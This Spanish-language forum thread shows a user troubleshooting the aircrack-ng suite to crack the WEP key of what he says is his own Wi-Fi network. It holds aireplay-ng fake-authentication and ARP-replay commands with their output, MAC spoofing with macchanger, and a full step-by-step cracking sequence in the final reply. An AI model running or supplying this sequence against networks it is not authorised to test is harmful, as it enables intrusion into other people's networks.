 Autor
|
Tema: atascado en la auditoria wifi, red cifrada wep (Leído 13,103 veces)
|
biznaka
 Desconectado
Mensajes: 106
|
Hola a todos:
De nuevo recurro a este foro para solucionar un problemilla mas, o al menos para pediros opinion.
Pues eso, estoy intentanto auditar mi red wifi, con encriptacion wep, empiezo todo bien. Pongo la interface en modo monitor, cambio la MAC a una direccion inventada por mi, hago airodump-ng eligiendo mi red con su canal, y al llegar a la fase de autentificarse con la orden o comando aireplay-ng -1 0 -e (nombre de la red) -a (direccion MAC de la AP cuya key queremos sacar) -h (direccion MAC de nuestra tarjeta cambiada) mon0
y esto es lo que responde la SHELL:
root@bt:~# aireplay-ng -1 0 -e SMC -a 00:04:E2:XXXXXXXXXXXX -h 00:1B:B1:XXXXXXXXXXX mon0
13:06:19 Waiting for beacon frame (BSSID: 00:04:E2:XXXXXXXXX) on channel 6
13:06:19 Sending Authentication Request (Open System)
13:06:21 Sending Authentication Request (Open System)
13:06:23 Sending Authentication Request (Open System)
13:06:25 Sending Authentication Request (Open System)
13:06:27 Sending Authentication Request (Open System)
13:06:29 Sending Authentication Request (Open System)
13:06:31 Sending Authentication Request (Open System)
13:06:33 Sending Authentication Request (Open System)
13:06:35 Sending Authentication Request (Open System)
13:06:37 Sending Authentication Request (Open System)
13:06:39 Sending Authentication Request (Open System)
13:06:41 Sending Authentication Request (Open System)
13:06:43 Sending Authentication Request (Open System)
13:06:45 Sending Authentication Request (Open System)
13:06:47 Sending Authentication Request (Open System)
13:06:49 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
Entiendo que los puntos finales, lo que dicen es algo asi como :
Estás lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque también puede fallar.
El controlador está correctamente parcheado e instalado.
La tarjeta está configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, asegúrate de que el firmware está actualizado.
Sobre la cercania o no del punto de acceso decir que el PWR que me da es de -65 a -77, creo que eso bastante señal no? ademas de que tengo mi router en una de las habitaciones del piso.
He realizado este auditoria tanto en ubuntu 11.04 y en bt 5 GNOME con arquitectura 64b.
Alguna sugerencia o ayuda? Gracias.
P.D.: Se que esto no corresponde a este hilo, pero mirando por los hilos de este foro tampoco he visto nada relacionado con BackTrack 5, pero hay foro y donde esta sobre esta distro? necesito ponerla en español, y otras cosas como instalar acrobat reader y office para poder leer manuales en esta distro.
|
|
|
|
« Última modificación: 12 Mayo 2011, 13:23 pm por ChimoC »
|
En línea
|
|
|
|
ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
Desconectado
Mensajes: 5.129
Paz, dignidad y justicia
|
Buenas:
Recuerda que puedes indicar muchas más opciones en aireplay-ng -1 .....
Prueba a modificar tambien el 0 por 10, 15, 20.....
Prueba a cambiar la MAC por una que sea real... (alguna vez he leido que ciertos APs discriminan si tal o cual STATION es real o no...)
Un saludo
ChimoC
P.D.: NO pongas MACs completas (te las he editado con XXXXX)
|
|
|
|
|
En línea
|
|
|
|
biznaka
Desconectado
Mensajes: 106
|
HOLA de nuevo:
Gracias chimoc por tu ayuda y perdon por lo de las MACs.
He cambiado el comando aireplay-ng -1 0 -e (Nombre de essid de la red) -a (direccion MAc del AP) -h (direccion mac de mi tarjeta, he puesto la MAC real) interface
y me ha conectado, pego la respuesta:
root@bt:~# aireplay-ng -1 0 -e SMC -a XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0
14:30:51 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
14:30:51 Sending Authentication Request (Open System)
14:30:51 Authentication successful
14:30:51 Sending Association Request
14:30:51 Association successful :-) (AID: 1)
despues. en otra consola, pongo el comando siguiente aireplay-ng -3 -b MAC del AP objetivo -h nuestra mac mon0. Dice que cuando alcance los 120000 arps, que busque la clave con aircrack.
El motivo es que me devuelve lo siguiente:
waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
Saving ARP requests in replay arp-0512-143157.cap
You should also start airodump-ng to capture replies.
Read 17810 packets (got 0 ARP request and 0 ACKs), sent 0 packets... (0 pps)
Vamos que empieza a leer pero captura ningun arps.
Que debo hacer? Gracias.
|
|
|
|
|
En línea
|
|
|
|
heaviloto
Desconectado
Mensajes: 784
|
hola,
prueba con un, A-2 a veces suele ser efectivo
un saludo
|
|
|
|
|
En línea
|
larga vida al rock&roll
heaviloto
Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)
|
|
|
biznaka
Desconectado
Mensajes: 106
|
hola heaviloto
No entiendo lo que me dices, como seria la linea de comando con el A-2 puesto? en qué lugar lo pongo? Gracias.
|
|
|
|
|
En línea
|
|
|
|
|
|
heaviloto
Desconectado
Mensajes: 784
|
hola, Prueba lo que te dice mi amigo heaviloto (que no me has traido lo de las recargas  ) je,je, je, je, tienes razon ChimoC, merecco la bulla, ya te doy un toque y hacemos una quedada un saludo, chavalote |
|
|
|
|
En línea
|
larga vida al rock&roll
heaviloto
Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)
|
|
|
biznaka
Desconectado
Mensajes: 106
|
copio lo que me sale a ver si lo hago bien o mal. Pondre mis pensamientos entre parentesis, espero no decir muchas tonterias, aunque diceindo tonterias es como aprendo.
root@bt:~# airodump-ng -c 6 -b 00:XX:XX:XX:XX:XX -w SMC mon0
me salen dos redes en el canal 6, aunq pongo la BSSID y el ESSID de la victima, me sale otra ademas, no se porqué.
pongo en otra consola la orden:
root@bt:~# aireplay-ng -1 10 -o 1 -e SMC -b 00:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0
Y empieza de una manera ciclica a aparecer en la nueva consola lo siguiente:
16:32:59 Sending Authentication Request (Open System)
16:32:59 Authentication successful
16:32:59 Sending Association Request
16:32:59 Association successful :-) (AID: 1)
16:33:09 Sending Authentication Request (Open System)
16:33:09 Authentication successful
16:33:09 Sending Association Request
16:33:09 Association successful :-) (AID: 1)
16:33:19 Sending Authentication Request (Open System)
16:33:19 Authentication successful
16:33:19 Sending Association Request
16:33:19 Association successful :-) (AID: 1)
(Decir que no sale en la linea "sending association request" lo siguiente (ACK), que he visto que sale en los manuales y a mi no) MIentras estan saliendo de manera ciclica esto que he pegado, en la consola donde selecciono el canal 6 mas el BSSID y el SSID, sale debajo STATION la MAC de mi victima con la MAC de mi tarjeta.
Despues en otra consola, ya van 3 con esta, pongo la orden siguiente, del ataque 2:
root@bt:~# aireplay-ng -2 -b 00:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0
Sale leyendo paquetes, y nada mas.
Despues si interrumpo con CONTROL + C, y pongo el ataque 3:
root@bt:~# aireplay-ng -3 -b 00:XX:XX:XX:XX:XX -h 00:XX:XX:XX:XX:XX mon0
Sale lo siguiente:
Read xxxxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Que hago mal? una ultima ayudita por favor. Gracias.
|
|
|
|
|
En línea
|
|
|
|
heaviloto
Desconectado
Mensajes: 784
|
hola,
que sigas leyendo, repasa los manuales que te a puesto ChimoC, y tu solito lo solucionaras, te lo aseguro
un saludo
|
|
|
|
|
En línea
|
larga vida al rock&roll
heaviloto
Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)
|
|
|
dvdr
Desconectado
Mensajes: 514
|
1shell recoje datas 2shell desautentificas y 3 shell ataca miratelo te lo an posteado tienes que entender lo que estas haciendo biznaka salu2 que lio tienes hay ahora no no estoy con linux bt5 esta encajonada solo a testig y estoy esperandoa que habran unos compañeros haber te lo pongo a ojo y lo mas simple posible para que lo agas y luego mirate los pdf y sus atques ok el canal es 9 tu mac sera esta 00:23:F8:83:7B:94 y macchanger esta 00:11:22:33:44:55 estos comandos da debaja tu red pero sugiero que ledes tu mismo al icono que a veces se levanta sudo airmon-ng stop wlan0 sudo ifconfig wlan0 down sudo macchanger --mac 00:11:22:33:44:55 wlan0 sudo airmon-ng start wlan0 sudo airodump-ng mon0 -----------CONTROL+C------------- sudo airodump-ng -c 9 --bssid 00:23:F8:83:7B:94 -w captura mon0 no cierres esa shell o lo joderas todo otra shell2 sudo aireplay-ng -1 0 -a 00:23:F8:83:7B:94 -h 00:11:22:33:44:55 mon0 cuando tede la salida le pones sudo aireplay-ng -3 -b 00:23:F8:83:7B:94 -h 00:11:22:33:44:55 mon0 ya estara recogiendo paquetes habres otra shell3 y la atacas con sudo aircrack-ng -z *.cap yo creo que lo puse bien pruebalo aber salu2 |
|
|
|
« Última modificación: 12 Mayo 2011, 20:32 pm por dvdr »
|
En línea
|
|
|
|
|
 |
